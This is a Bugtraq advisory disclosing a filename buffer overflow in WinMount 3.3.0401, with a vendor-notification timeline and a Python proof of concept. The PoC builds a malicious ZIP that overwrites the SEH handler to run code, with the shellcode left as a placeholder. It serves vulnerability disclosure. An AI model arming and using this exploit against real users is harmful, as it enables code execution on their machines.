[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
WinMount MOU File Handling Overflow Vulnerability
- To: bugtraq <bugtraq@xxxxxxxxxxxxxxxxx>
- Subject: WinMount MOU File Handling Overflow Vulnerability
- From: lilf <lilf@xxxxxxxxxxx>
- Date: Sat, 17 Apr 2010 13:30:11 +0800
WinMount MOU File Handling Overflow Vulnerability
Vulnerability: WinMount 3.3.0401
Vendor: www.winmount.com
1) Software Description:
WinMount is an useful windows utility. It is a compression tool, also a virtual
drive tool. It can compress files, decompress/ browse/convert compressed
archieves, it
also can mount MOU ZIP RAR and CD DVD HDD images to a virtual disk or virtual
folder. Supported formats: MOU ZIP RAR CAB ARJ ISO GZ BZ2 TAR WIM VHD VDI VMDK
ISO ISZ BIN MDS/MDF NRG IMG CCD CUE APE FLAC WV.
2) Details:
A filename buffer overflow vulnerability in WinMount 3.3.0401. Poc can generate
a zip file, and attackers can change the zip file into a mou file by using
WinMount. Exploit successfully allows attackers to execute arbitrary code.
3) Credit:
The vulnerability was discovered by Lufeng Li
4) Timeline:
2010.04.12 Report to vendor
2010.04.14 Vendor upgrade WinMount
2010.04.16 Public
5) Poc:
import os
sploitfile="test.zip"
ldf_header =('\x50\x4B\x03\x04\x14\x00\x00'
'\x00\x08\x00\xB7\xAC\xCE\x34\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
'\xd0\xff'
'\x00\x00\x00')
cdf_header = ("\x50\x4B\x01\x02\x14\x00\x14"
"\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\xd0\xff"
"\x00\x00\x00\x00\x00\x00\x01\x00"
"\x24\x00\x00\x00\x00\x00\x00\x00")
eofcdf_header = ("\x50\x4B\x05\x06\x00\x00\x00"
"\x00\x01\x00\x01\x00"
"\xfe\xff\x00\x00"
"\xee\xff\x00\x00"
"\x00\x00")
print "[+] Preparing payload\n"
size=65484
junk='A'*420
nseh='\x89\x8a\x8b\x8c'
seh='\x84\x5b\xac\x8d'
junk_='A'*33
jumpto='\x05\x12\x11\x46\x2d\x11\x11\x46\x50\x46\xac\xe4'#make eax point to
shellcode and jump to shellcode
shellcode=("the shellcode here will be changed into unicode")#encode by alpha2
junk__='B'*80
last='C'*(size-420-len(nseh+seh+junk_+jumpto+junk__+shellcode))
payload=junk+nseh+seh+junk_+jumpto+junk__+shellcode+last+".wav"
evilzip = ldf_header+payload+cdf_header+payload+eofcdf_header
print "[+] Removing old zip file\n"
os.system("del "+sploitfile)
print "[+] Writing payload to file\n"
fobj=open(sploitfile,"w",0)
fobj.write(evilzip)
print "generate zip file "+(sploitfile)
fobj.close()
print '[+] Wrote %d bytes to file sploitfile\n'%(len(evilzip))
print "[+] Payload length :%d \n"%(len(payload))
--------------
lilf
2010-04-17
---------------------------------------------------------------------------------------------------
Confidentiality Notice: The information contained in this e-mail and any
accompanying attachment(s)
is intended only for the use of the intended recipient and may be confidential
and/or privileged of
Neusoft Corporation, its subsidiaries and/or its affiliates. If any reader of
this communication is
not the intended recipient, unauthorized use, forwarding, printing, storing,
disclosure or copying
is strictly prohibited, and may be unlawful.If you have received this
communication in error,please
immediately notify the sender by return e-mail, and delete the original message
and all copies from
your system. Thank you.
---------------------------------------------------------------------------------------------------